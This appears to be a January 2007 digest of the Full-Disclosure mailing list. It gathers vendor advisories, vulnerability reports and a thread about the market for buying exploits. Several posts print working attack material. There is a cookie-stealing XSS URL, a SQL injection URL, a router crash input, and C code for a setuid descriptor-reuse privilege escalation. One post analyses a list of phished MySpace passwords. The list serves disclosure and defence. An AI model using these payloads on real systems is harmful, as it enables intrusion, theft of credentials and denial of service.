Re: [Full-disclosure] Grab a myspace credential

2007-01-18 Thread Troy Cregger
Thanks for the crunch down on the data Carl. I've not had time to
analyze the list myself but that's the exact information I would have
been after.

Cheers!

Sûnnet Beskerming wrote:
 Where did it all come from?  The prevailing theory is that the 'Tom'  
 account was successfully phished / breached (note - the real Tom has  
 a separate account) and used to send out a Bulletin to all Friends  
 (almost all users on MySpace) with the malicious link contained.   
  From there it was a matter of waiting for the clicks to roll in.
 
 Claimed evidence of the hack of 'Tom' is provided across several Digg  
 stories (http://www.digg.com/security/MySpace_s_Tom_s_Profile_Hacked_Sending_Links_to_Phishing_Website)  
 (http://digg.com/security/Myspace_Tom_gets_hacked_PIC) from the 2-3  
 days prior to the list being pushed to F-D.  Although screenshots can  
 be faked, the examples that have been posted do correctly reflect how  
 a Bulletin-based attack would appear.  With the numerous current  
 active XSS vulnerabilities present on MySpace, it is reasonable to  
 believe this chain of events.
 
 Basic analysis of the list (which I believe is a much better source  
 than the one Bruce Schneier commented on  
 [http://www.schneier.com/blog/archives/2006/12/realworld_passw.html]) throws up some  
 interesting output:
 
   - A little more than 2% of the full list is abuse directed at the  
 site operator (more when duplicate records are removed), including  
 some basic ASCII porn mixed in with the results.
 
   - For too many users, if the login didn't work the first time,  
 nothing was going to stop them from try, try, trying again (I'd  
 regard those records as excellent live data).  Removing duplicate  
 logins takes the list from 56k records to 41k.
 
   - Even better, some of the repeated attempts are users correcting  
 mistakes from the first time they tried to enter their details.
 
   - It's a family thing.  It appears that some users (who only tried  
 5-6 times to login) convinced family members to try and login to the  
 site themselves (or family were caught the same way).
 
   - An obscure email address is not an effective means of hiding  
 identity, especially if the user then spells out their full name in  
 their password.
 
   - While not the exclusive domain of Hotmail (15162/11360)  / AOL  
 (7137/5448) / MSN (1449/1069) / Gmail (825/620) / Yahoo (16562/12168)  
 account holders, the list is heavily biased towards them (orig list/ 
 duplicates removed).
 
   - Approximately 25% of the results for each of the main email  
 domains is the result of multiple attempted logins (surprisingly  
 consistent across each domain).
 
   - At least one request from a user to target a specific myspace  
 account.
 
   - Password strength is fairly weak for most users.  A simple  
 dictionary attack will capture most of the passwords available.   
 Repeated login attempts appear to be associated with weaker  
 passwords.  Variations to standard dictionary words seem to be  
 restricted largely to adding a number before and / or after the word.
 
 
 Carl
 
 Sûnnet Beskerming Pty. Ltd.
 Adelaide, Australia
 http://www.beskerming.com
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] mbsebbs 0.70.0 below local root exploit

2007-01-18 Thread Micheal Turner
https://prdelka.blackart.org.uk/exploitz/prdelka-vs-GNU-mbsebbs.c

sux, fixes available.





[Full-disclosure] The Quidway Router local DOS

2007-01-18 Thread handrix cobra

Quidway Router Local DOS attack
By: Handrix handrix_at_morx_org
18 January 2007
MorX security research team
www.morx.org


Description:
The Quidway Router's firmware is vulnerable to a local denial of service
attack; there is a request to turn off the engine.
Simple PoC released by:

Routersh arp
.A\
AAA.AA.AA

After the router crashes, wait a while and type sh version to verify this
bug:

Routersh ver
VRP (tm) software, Version 1.43 2500E-003
Copyright (c) 1997-2002 HUAWEI TECH CO., LTD.
Compiled 20:53:47, Nov  7 2002 ,
Quidway R1600 uptime is 0 days 0 hours 1 minutes 3 seconds.

Quidway R1600 with 1 68360 Processor
16   MbytesDRAM
4608 KbytesFlash Memory
hardware version is 1.0


Vendor: Huawei
Vulnerable version:
Quidway R1600 (Versatile Routing Platform, version 1.43 2500E-003)
Maybe others.

[Full-disclosure] Cisco Security Advisory: SSL/TLS Certificate and SSH Public Key Validation Vulnerability

2007-01-18 Thread Cisco Systems Product Security Incident Response Team

Cisco Security Advisory: 
SSL/TLS Certificate and SSH Public Key Validation Vulnerability

Advisory ID: cisco-sa-20070118-certs

http://www.cisco.com/warp/public/707/cisco-sa-20070118-certs.shtml

Revision 1.0

For Public Release 2007 January 18 1600 UTC (GMT)

---

Summary
===

The Cisco Security Monitoring, Analysis and Response System (CS-MARS)
and the Cisco Adaptive Security Device Manager (ASDM) do not validate
the Secure Sockets Layer (SSL)/Transport Layer Security (TLS)
certificates or Secure Shell (SSH) public keys presented by devices
they are configured to connect to. Malicious users may be able to use
this lack of certificate or public key validation to impersonate the
devices that these affected products connect to, which could then be
used to obtain sensitive information or misreport information.

Cisco has made free software available to address this vulnerability
for affected customers.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20070118-certs.shtml.

Affected Products
=

The following products are affected by the vulnerability described in
this document:

  * Cisco Security Monitoring, Analysis and Response System (CS-MARS)

All CS-MARS versions prior to 4.2.3 are affected.

To verify the version of CS-MARS software, log into CS-MARS web
interface using a web browser and go to the Help tab located on
the top-right corner of the browser window. Then click on the
About link. The CS-MARS version will be displayed in the center
of the browser window under CS-MARS Information.

Alternatively, it is possible to use an SSH connection or a direct
serial console connection to verify the version of the CS-MARS
software by logging into the system administration command line
interface with the pnadmin account and executing the version
command:

shell$ ssh [EMAIL PROTECTED]
[EMAIL PROTECTED]'s password:
Last login: Mon Jan  8 18:42:45 2007 from 10.0.0.2

  CS MARS - Mitigation and Response System

? for list of commands

[pnadmin]$ version
4.2.3 (2403)


  * Cisco Adaptive Security Device Manager (ASDM)

All ASDM versions prior to 5.2(2.54) are affected when the ASDM
Launcher (the stand-alone version of ASDM) is used.

If the ASDM Applet is used, i.e. ASDM is launched via a web
browser, then it is the web browser's responsibility to verify the
certificates presented by the devices that ASDM connects to. The
user can instruct the web browser to save devices' root Certificate
Authority certificates so a warning is generated if something
changes (this can be used as a workaround - please refer to the
Workarounds section for details.)

To verify the version of ASDM software, launch ASDM and look in the
General tab of the Device Information section.

No other Cisco products are currently known to be affected by this
vulnerability.

Details
===

Some Cisco products connect to different devices for configuration or
monitoring purposes. The actual connection method used varies depending
on the product, but SSL/TLS and SSH are the most prevalent ones due to
their use of strong cryptography to ensure the confidentiality and
integrity of the communication.

Two examples of these products include the Cisco Security Monitoring,
Analysis and Response System (CS-MARS), a security threat mitigation
system that talks to devices such as IPS sensors and firewalls, and the
Cisco Adaptive Security Device Manager (ASDM), which provides
management and monitoring services for the Cisco ASA 5500 Series
Adaptive Security Appliances, Cisco PIX 500 Series Security Appliances
and the Firewall Services Modules for the Cisco Catalyst 6500 Switches
and the Cisco 7600 Series Routers.

When these products connect to their managed devices via SSL/TLS or
SSH, they do not validate the SSL/TLS certificates or SSH public keys
presented by these managed devices.

Because the certificates and public keys presented by devices are not
validated, in the event that a certificate or public key has changed,
the affected products will not be able to determine whether the device
they are communicating with is legitimate, or if it is a device
impersonating a legitimate one.

The following Cisco Bug IDs are being used to track these
vulnerabilities on the affected products:

  * CS-MARS - CSCsf95930 
  * ASDM - CSCsg78595 

Vulnerability Scoring Details
+

Cisco is providing scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS).

Cisco will provide a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.

Cisco PSIRT will set the bias in all cases to normal

[Full-disclosure] CYBSEC - Security Advisory: SAP Internet Graphics Service (IGS) Remote Buffer Overflow

2007-01-18 Thread CYBSEC Advisories
(The following advisory is also available in PDF format for download at:
http://www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Remote_Buffer_Overflow.pdf
 )

This advisory contains the full-detailed information regarding the 
vulnerability described in CYBSEC Security Pre-Advisory: SAP Internet Graphics
Service (IGS) Remote Buffer Overflow.


CYBSEC S.A.
www.cybsec.com

Advisory Name: SAP Internet Graphics Service (IGS) Remote Buffer Overflow
==

Vulnerability Class: Heap Buffer Overflow


Release Date: 2007-01-18
=

Affected Applications:
==
* SAP IGS 6.40 Patchlevel = 15
* SAP IGS 7.00 Patchlevel = 3

Affected Platforms:
===
* AIX 64 bits
* HP-UX on IA64 64bit
* HP-UX on PA-RISC 64bit
* Linux on IA32 32bit
* Linux on IA64 64bit
* Linux on Power 64bit
* Linux on x86_64 64bit
* Linux on zSeries 64bit
* OS/400 V5R2M0
* Solaris on SPARC 64bit
* TRU64 64bit
* Windows Server on IA32 32bit
* Windows Server on IA64 64bit
* Windows Server on x64 64bit

Local / Remote: Remote
===

Severity: High
=

Author:  Mariano Nuñez Di Croce
===

Vendor Status:
==
* Confirmed, update released.

Reference to Vulnerability Disclosure Policy:
=
http://www.cybsec.com/vulnerability_policy.pdf

Product Overview:
==
The IGS provides a server architecture where data from an SAP System or other 
sources can be used to generate graphical or non-graphical output.

It is important to note that IGS is installed and activated by default with the 
Web Application Server (versions = 6.30)

Vulnerability Description:
==
A specially crafted HTTP request can trigger a remote buffer overflow in SAP 
IGS service.

Technical Details:
==

The ADM:GETLOGFILE command receives a portwatcher as a parameter. If the 
specified portwatcher is not found, an error message is returned to the client.

The vulnerability specifically exists in the processing of this error message.
The message is built by the use of the _snprintf() function, which helps to 
prevent the occurrence of buffer overflows by limiting the number of bytes
written to the destination buffer:

- --
8B5424 14    MOV EDX,DWORD PTR SS:[ESP+14]  ; Portwatcher string (controlled)
52           PUSH EDX
68 B49C5700  PUSH igsmux.00579CB4           ; ASCII "Could not find portwatcher %s"
8D8424 B000  LEA EAX,DWORD PTR SS:[ESP+B0]  ; Destination buffer
68 0004      PUSH 400                       ; Output 1024 bytes max
50           PUSH EAX
E8 DA881100  CALL JMP.MSVCR71._snprintf
- --

Therefore, if a parameter of more than 998 bytes is received, only the first 
1024 bytes of the resulting string (after concatenation) would be stored
in the destination buffer and no overflow would occur.

To present this error message to the client, an HTTP response is crafted. Its 
content is prepared in a buffer stored in the heap. After some
procedures, the error message string is copied to this buffer:

- --
8B4D 0C      MOV ECX,DWORD PTR SS:[EBP+C]   ; _snprintf() result value
8B75 08      MOV ESI,DWORD PTR SS:[EBP+8]   ; Error message string
8DB8 A000    LEA EDI,DWORD PTR DS:[EAX+A0]  ; Destination buffer
8BC1         MOV EAX,ECX
C1E9 02      SHR ECX,2
F3:A5        REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
- --

The _snprintf() function returns the total amount of bytes written, so above 
code would not seem to be unreasonable. The problem is that, if the
source buffer is larger than the maximum number of characters to store (count), 
a particular behavior takes place:

"If the number of bytes required to store the data exceeds count, then count 
bytes of data are stored in buffer and a negative value is returned" [MSDN]

Therefore, if the string is larger than 1024 bytes, after the first instruction 
of the presented code  ECX would contain a negative number treated as
unsigned, resulting in a very big number. Then, when the memory copy operation 
takes place, heap space reserved would be overflowed.

This will overwrite heap block structures, which would eventually be used and 
result in the execution of the famous set of instructions:

- --
8901         MOV DWORD PTR DS:[ECX],EAX
8948 04      MOV DWORD PTR DS:[EAX+4],ECX
- --

As both ECX and EAX can be controlled, an arbitrary DWORD overwrite is 
possible, leading to the possibility of executing 
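
The return-value mistake described in the advisory above, as an added example (not code from the advisory or from SAP). `msvc_style_snprintf` is a portable stand-in written here that follows the quoted MSDN contract, and all function names are hypothetical; the flawed path only computes the copy count, it does not perform the copy.

```c
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MSG_CAP 1024                       /* PUSH 400 (hex) in the listing */
#define FMT "Could not find portwatcher %s"

/* Portable stand-in (assumption) for the MSVCR71 _snprintf contract the
 * advisory quotes: when the output needs more than count bytes, count bytes
 * are stored without a terminator and a negative value is returned. */
int msvc_style_snprintf(char *buf, size_t count, const char *fmt, ...)
{
    char tmp[4096];
    va_list ap;
    int need;

    if (count >= sizeof tmp)
        return -1;
    va_start(ap, fmt);
    need = vsnprintf(tmp, sizeof tmp, fmt, ap);
    va_end(ap);
    if (need < 0)
        return -1;
    if ((size_t)need > count) {            /* truncated: no NUL, negative */
        memcpy(buf, tmp, count);
        return -1;
    }
    memcpy(buf, tmp, (size_t)need);
    if ((size_t)need < count)
        buf[need] = '\0';
    return need;
}

/* Flawed pattern: the int result is reused as an unsigned dword count
 * (MOV ECX,result ; SHR ECX,2 ; REP MOVS). Only the count is computed. */
uint32_t flawed_copy_dwords(const char *portwatcher)
{
    char msg[MSG_CAP];
    int ret = msvc_style_snprintf(msg, sizeof msg, FMT, portwatcher);
    return (uint32_t)ret >> 2;
}

/* Hardened pattern: treat a negative or full-buffer result as truncation,
 * terminate the message, and bound the copy by the destination's size.
 * Returns bytes copied (excluding NUL) or -1 if dst cannot hold the message. */
long build_error_checked(const char *portwatcher, char *dst, size_t dst_cap)
{
    char msg[MSG_CAP];
    int ret = msvc_style_snprintf(msg, sizeof msg, FMT, portwatcher);
    size_t len = (ret < 0 || (size_t)ret >= sizeof msg) ? sizeof msg - 1
                                                        : (size_t)ret;
    msg[len] = '\0';
    if (len + 1 > dst_cap)
        return -1;
    memcpy(dst, msg, len + 1);
    return (long)len;
}

/* Helpers: run both paths on a constructed portwatcher name of n 'A' bytes. */
static void fill_name(char *name, size_t n)
{
    memset(name, 'A', n);
    name[n] = '\0';
}

uint32_t flawed_dwords_for_len(size_t n)
{
    char name[3000];
    if (n >= sizeof name)
        n = sizeof name - 1;
    fill_name(name, n);
    return flawed_copy_dwords(name);
}

long checked_len_for_len(size_t n, size_t dst_cap)
{
    char name[3000], dst[2048];
    if (n >= sizeof name)
        n = sizeof name - 1;
    if (dst_cap > sizeof dst)
        dst_cap = sizeof dst;
    fill_name(name, n);
    return build_error_checked(name, dst, dst_cap);
}

int main(void)
{
    printf("3-byte name   : %u dwords (flawed count)\n",
           (unsigned)flawed_dwords_for_len(3));
    printf("2000-byte name: %u dwords (flawed count)\n",
           (unsigned)flawed_dwords_for_len(2000));
    printf("2000-byte name: %ld bytes (checked copy)\n",
           checked_len_for_len(2000, 2048));
    return 0;
}
```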

[Full-disclosure] Persistent Web Backdoor

2007-01-18 Thread pdp (architect)
It is simple, it is lame, yet very interesting. This kind of stuff
raises a lot of questions.
http://www.gnucitizen.org/projects/greasecarnaval

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org



[Full-disclosure] Vulnerability Disclosure comments

2007-01-18 Thread Shawna McAlearney
Thank you to all who helped out by sharing your opinions on our 
vulnerability articles!

[Full-disclosure] The vulnerabilities festival !

2007-01-18 Thread Omid
Hello everyone :)

Several vulnerabilities have been found in several programs :
*) 5 sql injection bugs in PHP-Nuke
*) Several sql injection and full path disclosure bugs in Joomla 1.5.0 Beta
*) 1 sql injection bug in Mambo 4.6.1 and Joomla 1.0.11
*) 1 sql injection and 1 XSS bugs in Virtuemart 1.0.7
*) 5 sql injection bugs in Xoops 2.0.16 core + weblinks module
*) 3 sql injection and 1 XSS bugs in DocMan 1.3 RC2
*) 2 sql injection bugs in ATutor 1.5.3.2
*) 3 sql injection bugs in Letterman 1.2.3
*) 1 file disclosure bug in WDaemon 9.5.4
*) 3 security bugs in PostNuke 0.764

I tried to omit dangerous and exploitable details from this advisory, so
some sections are not described in detail ...

The original advisory (in Persian) is located at :
http://www.hackers.ir/advisories/festival.txt


---
I) PHP-Nuke :
There are 5 sql injections in PHP-Nuke 7.9 (and maybe other versions including
version 8) :

Three of them exist in 'advertising', 'weblinks' and 'reviews' sections, which
can be dangerous and are not described here .
Two others are in admin section :

The 'active' parameter has been passed to module_status() function without
proper checking :

File /admin/modules/modules.php, Line 281 :
**  module_status($mid, $active);

And in module_status() function :

File /admin/modules/modules.php, Line 173 :
**  $db->sql_query("update " . $prefix . "_modules set active='$active' where mid='$mid'");


Also the 'ad_class', 'imageurl', 'clickurl', 'ad_code' and 'position' parameters
are not checked properly :

File modules/Advertising/admin/index.php, Line 1131 :
**  BannersAdd($name, $cid, $adname, $imptotal, $imageurl, $clickurl, $alttext, $position, $active, $ad_class, $ad_code, $ad_width, $ad_height);

And in BannersAdd() function :

File modules/Advertising/admin/index.php, Line 351 :
**  $db->sql_query("insert into " . $prefix . "_banner values (NULL, '$cid', '$adname', '$imptotal', '1', '0', '$imageurl', '$clickurl', '$alttext', now(), '0000-00-00 00:00:00', '$position', '$active', '$ad_class', '$ad_code', '$ad_width', '$ad_height')");

The author told me he will fix the bugs for the next version (8.1) .


---
II) Joomla 1.5.0 Beta :
As Joomla! 1.5.0 Beta default installation has mentioned :
Joomla! 1.5.0 Beta should NOT to be used for `live` or `production` sites.
So, I can release more details about these bugs :)
There are several sql injection bugs in Joomla 1.5.0 Beta :

The 'searchword' parameter is not checked properly before being used
in the sql query in several files :

In both 'plugins/search/content.php' and 'plugins/search/weblinks.php'
files, the '$where' variable is not checked .

Also, in 'plugins/search/contacts.php', 'plugins/search/categories.php' and
'plugins/search/sections.php' files, the '$text' var is affected. For example :

File plugins/search/sections.php, Line 75 :
::  $query = "SELECT a.name AS title,"
::  . "\n a.description AS text,"
::  . "\n '' AS created,"
::  . "\n '2' AS browsernav,"
::  . "\n a.id AS secid, m.id AS menuid, m.type AS menutype"
::  . "\n FROM #__sections AS a"
::  . "\n LEFT JOIN #__menu AS m ON m.componentid = a.id"
**  . "\n WHERE ( a.name LIKE '%$text%'"
**  . "\n OR a.title LIKE '%$text%'"
**  . "\n OR a.description LIKE '%$text%' )"
::  . "\n AND a.published = 1"
::  . "\n AND a.access = " .$user->get( 'gid' )
::  . "\n AND ( m.type = 'content_section' OR m.type = 'content_blog_section' )"
::  . "\n GROUP BY a.id"
::  . "\n ORDER BY $order"
::  ;

The search word is limited to 20 characters, so this bug doesn't seem to be
critical .
PoC : 
http://hacked/index.php?searchword=%25'/**/SQLINJECTIONoption=com_searchItemid=0


Another sql injection exists in check() function . The 'email' parameter is
not checked properly :

File libraries/joomla/database/table/user.php, Line 104 :
::  

[Full-disclosure] [x0ne-h4ck] sabros.us 1.7 XSS Exploit

2007-01-18 Thread corrado.liotta
-=[ADVISORY---]=-
  
sabros.us 1.7
   
  Author: CorryL[EMAIL PROTECTED]   
-=[---]=-


-=[+] Application:sabros.us 
-=[+] Version:1.7
-=[+] Vendor's URL:   http://sourceforge.net/projects/sabrosus/
-=[+] Platform:   Windows\Linux\Unix
-=[+] Bug type:   Cross-Site Script
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:   CorryL  ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:   www.x0n3-h4ck.org
-=[+] Virtual Office:  http://www.kasamba.com/CorryL
-=[+] Irc Chan: irc.darksin.net #x0n3-h4ck


..::[ Description ]::..

sabros.us is a CMS to put your bookmarks online with folksonomy support; 
just like del.icio.us, but the big difference is you will have 
the complete control of the source code and written on PHP with MySQL 
as backend we make it cross platform.


..::[ Proof Of Concept ]::..

http://remote-server/index.php?tag=/titlescriptalert(document.cookie)/script







[Full-disclosure] [ MDKSA-2007:018 ] - Updated koffice packages fix crafted pdf file vulnerability

2007-01-18 Thread security

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:018
 http://www.mandriva.com/security/
 ___
 
 Package : koffice
 Date: January 18, 2007
 Affected: 2007.0
 ___
 
 Problem Description:
 
 The Adobe PDF specification 1.3, as implemented by xpdf 3.0.1 patch 2,
 kpdf in KDE before 3.5.5, and other products, allows remote attackers
 to have an unknown impact, possibly including denial of service
 (infinite loop), arbitrary code execution, or memory corruption, via a
 PDF file with a (1) crafted catalog dictionary or (2) a crafted Pages
 attribute that references an invalid page tree node.

 The updated packages have been patched to correct this problem.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0104
 ___
 
 Updated Packages:
 

[Full-disclosure] [ MDKSA-2007:019 ] - Updated pdftohtml packages fix crafted pdf file vulnerability

2007-01-18 Thread security

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:019
 http://www.mandriva.com/security/
 ___
 
 Package : pdftohtml
 Date: January 18, 2007
 Affected: 2006.0, 2007.0
 ___
 
 Problem Description:
 
 The Adobe PDF specification 1.3, as implemented by xpdf 3.0.1 patch 2,
 kpdf in KDE before 3.5.5, and other products, allows remote attackers
 to have an unknown impact, possibly including denial of service
 (infinite loop), arbitrary code execution, or memory corruption, via a
 PDF file with a (1) crafted catalog dictionary or (2) a crafted Pages
 attribute that references an invalid page tree node.

 The updated packages have been patched to correct this problem.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0104
 ___
 
 Updated Packages:
 
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDKSA-2007:020 ] - Updated poppler packages fix crafted pdf file vulnerability

2007-01-18 Thread security


 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:020
 http://www.mandriva.com/security/
 ___
 
 Package : poppler
 Date: January 18, 2007
 Affected: 2007.0, Corporate 4.0
 ___
 
 Problem Description:
 
 The Adobe PDF specification 1.3, as implemented by xpdf 3.0.1 patch 2,
 kpdf in KDE before 3.5.5, and other products, allows remote attackers
 to have an unknown impact, possibly including denial of service
 (infinite loop), arbitrary code execution, or memory corruption, via a
 PDF file with a (1) crafted catalog dictionary or (2) a crafted Pages
 attribute that references an invalid page tree node.

 The updated packages have been patched to correct this problem.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0104
 ___
 
 Updated Packages:
 

[Full-disclosure] [ MDKSA-2007:021 ] - Updated xpdf packages fix crafted pdf file vulnerability

2007-01-18 Thread security


 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:021
 http://www.mandriva.com/security/
 ___
 
 Package : xpdf
 Date: January 18, 2007
 Affected: 2007.0, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 The Adobe PDF specification 1.3, as implemented by xpdf 3.0.1 patch 2,
 kpdf in KDE before 3.5.5, and other products, allows remote attackers
 to have an unknown impact, possibly including denial of service
 (infinite loop), arbitrary code execution, or memory corruption, via a
 PDF file with a (1) crafted catalog dictionary or (2) a crafted Pages
 attribute that references an invalid page tree node.

 The updated packages have been patched to correct this problem.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0104
 ___
 
 Updated Packages:
 


[Full-disclosure] [ MDKSA-2007:022 ] - Updated tetex packages fix crafted pdf file vulnerability

2007-01-18 Thread security


 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:022
 http://www.mandriva.com/security/
 ___
 
 Package : tetex
 Date: January 18, 2007
 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 The Adobe PDF specification 1.3, as implemented by xpdf 3.0.1 patch 2,
 kpdf in KDE before 3.5.5, and other products, allows remote attackers
 to have an unknown impact, possibly including denial of service
 (infinite loop), arbitrary code execution, or memory corruption, via a
 PDF file with a (1) crafted catalog dictionary or (2) a crafted Pages
 attribute that references an invalid page tree node.

 The updated packages have been patched to correct this problem.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0104
 ___
 
 Updated Packages:
 

[Full-disclosure] Multiple OS kernel insecure handling of stdio file descriptor

2007-01-18 Thread XFOCUS Security Team

XFOCUS team (http://www.xfocus.org/) has discovered insecure handling of stdio
file descriptors in multiple OS kernels.

===
Affected OS Version

AIX 5.3
Solaris 9
HPUX B11.11
(maybe other versions; we did not test)


===
Description

The affected OSes allow local users to write to or read from restricted
files by closing the file descriptors 0 (standard input), 1 (standard
output), or 2 (standard error), which may then be reused by a called
setuid process that intended to perform I/O on normal files. An attack
that exploits this vulnerability can possibly gain root rights.



POC

-bash-3.00$ oslevel -r
5300-03
-bash-3.00$ ls -l bb
-rw-r--r--   1 root system0 12月05 20时34 bb
-bash-3.00$ ls -l k
-rwxr-xr-x   1 root system58242 12月03 23时13 k
-bash-3.00$ ls -l tt
-rwsr-xr-x   1 root system59096 12月03 23时14 tt  (this is a
suid program,called by k)
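-bash-3.00$ cat k.c
#include <unistd.h>

int main()
{
  close(2); //close fd 2 before calling tt
  execl("./tt","./tt",(char *)0);
}
-bash-3.00$ cat tt.c
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>

int main()
{

  printf("euid=%i\n",geteuid());
  int f=open("/tmp/bb",1); //1 == O_WRONLY; gets the lowest free fd
  printf("f=%i\n",f);
  write(2,"hello\n",6); //meant for stderr
}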

-bash-3.00$ id
uid=202(cloud) gid=1(staff)
-bash-3.00$ ./k
euid=0
f=2  #err info wrote into bb file
-bash-3.00$ ls -l bb
-rw-r--r--   1 root system6 12月05 20时35 bb


=
Time Line
2005-12-xx   Discovered this vulnerability
2006-12-12   Initial vendor notification
2006-12-12   HP responds, assigns SSRT061287;
             Sun responds but mistakes this vulnerability for an
             application bug and hopes we figure out a real attack
             vector;
             AIX: no response;
2007-01-18   Public disclosure

-- 

Kind Regards,

---
XFOCUS Security Team
http://www.xfocus.org



Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Roman Medina-Heigl Hernandez
Simon Smith wrote:
> Amen!
> KF is 100% on the money. I can arrange the legitimate purchase of most
> working exploits for significantly more money than iDefense, In some cases
> over $75,000.00 per purchase. The company that I am working with has a
> relationship with a legitimate buyer, all transactions are legal. If you're

<naive>

I was wondering which kind of (legal) enterprises/organizations would pay
$75000 for a simple (or not so simple) exploit.
- governmental organizations (defense? DoD? FBI? ...)
- firms offering high-profiled pen-testing services?
- ... ?

What about the ROI for such investment?

</naive>

Regards,
-Roman



Re: [Full-disclosure] Multiple OS kernel insecure handling of stdio file descriptor

2007-01-18 Thread 3APA3A
Dear XFOCUS Security Team,

A more complicated variant of this vulnerability (exhausting all
available descriptors and closing standard one) was reported by Joost
Pol for BSD systems. It's very funny to see commercial Unix variants
were not checked against it and simplest variant of this attack was not
fixed for 5 years.

See: http://security.nnov.ru/news1956.html

--Thursday, January 18, 2007, 5:21:52 PM, you wrote to full-disclosure@lists.grok.org.uk:

XST> The affected OSes allows local users to write to or read from restricted
XST> files by closing the file descriptors 0 (standard input), 1 (standard
XST> output), or 2 (standard error), which may then be reused by a called
XST> setuid process that intended to perform I/O on normal files. the attack
XST> which exploit this vulnerability possibly get root right.



-- 
~/ZARAZA
http://security.nnov.ru/



Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Simon Smith
Roman, 
   It depends on the needs and requirements of the buyer.


On 1/18/07 4:22 AM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED]
wrote:

> Simon Smith wrote:
>> Amen!
>> KF is 100% on the money. I can arrange the legitimate purchase of most
>> working exploits for significantly more money than iDefense, In some cases
>> over $75,000.00 per purchase. The company that I am working with has a
>> relationship with a legitimate buyer, all transactions are legal. If you're
>
> <naive>
>
> I was wondering which kind of (legal) enterprises/organizations would pay
> $75000 for a simple (or not so simple) exploit.
> - governmental organizations (defense? DoD? FBI? ...)
> - firms offering high-profiled pen-testing services?
> - ... ?
>
> What about the ROI for such investment?
>
> </naive>
>
> Regards,
> -Roman
 


Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Simon Smith
Oh, 
About your ROI question, that varies per buyer. I am not usually told
about why a buyer needs something as that's none of my business.

On 1/18/07 4:22 AM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED]
wrote:

> Simon Smith wrote:
>> Amen!
>> KF is 100% on the money. I can arrange the legitimate purchase of most
>> working exploits for significantly more money than iDefense, In some cases
>> over $75,000.00 per purchase. The company that I am working with has a
>> relationship with a legitimate buyer, all transactions are legal. If you're
>
> <naive>
>
> I was wondering which kind of (legal) enterprises/organizations would pay
> $75000 for a simple (or not so simple) exploit.
> - governmental organizations (defense? DoD? FBI? ...)
> - firms offering high-profiled pen-testing services?
> - ... ?
>
> What about the ROI for such investment?
>
> </naive>
>
> Regards,
> -Roman
 


[Full-disclosure] [ MDKSA-2007:023 ] - Updated libgtop2 packages fix buffer overflow vulnerability

2007-01-18 Thread security


 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:023
 http://www.mandriva.com/security/
 ___
 
 Package : libgtop2
 Date: January 18, 2007
 Affected: 2007.0
 ___
 
 Problem Description:
 
 Stack-based buffer overflow in the glibtop_get_proc_map_s function in
 libgtop before 2.14.6 (libgtop2) allows local users to cause a denial
 of service (crash) and possibly execute arbitrary code via a process
 with a long filename that is mapped in its address space, which
 triggers the overflow in gnome-system-monitor.

 The updated packages have been patched to correct this problem.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0235
 ___
 
 Updated Packages:
 


[Full-disclosure] EUSecWest 2007 Papers

2007-01-18 Thread Dragos Ruiu
Hi,

For those who asked, we are still processing the submissions for CanSecWest
and the call closed, please stand by. The paper selections are back from the
reviewers for EUSecWest, in London on March 1-2.

In absolutely random order:

Threats against and protection of Microsoft's internal network - Greg Galford, Microsoft
Linux Kernel == Security Nightmare - Marcel Holtmann, Red Hat
/GS and ASLR in Windows Vista - Ollie Whitehouse, Symantec
Fuzzing: history, perspectives and limits - Christian Wieser, Oulu university
The new OWASP Web Application Penetration Testing Methodology - Matteo Meucci & Alberto Revelli, OWASP-Italy
Reverse Engineering Malicious Javascript - Jose Nazario, Ph.D., Arbor
Bypassing NAC Systems - Ofir Arkin, Insightix
RFID - Adam Laurie, trifinite
Protecting Next-Gen Networks @ Nx10G link sizes - Jim Deleskie, Teleglobe
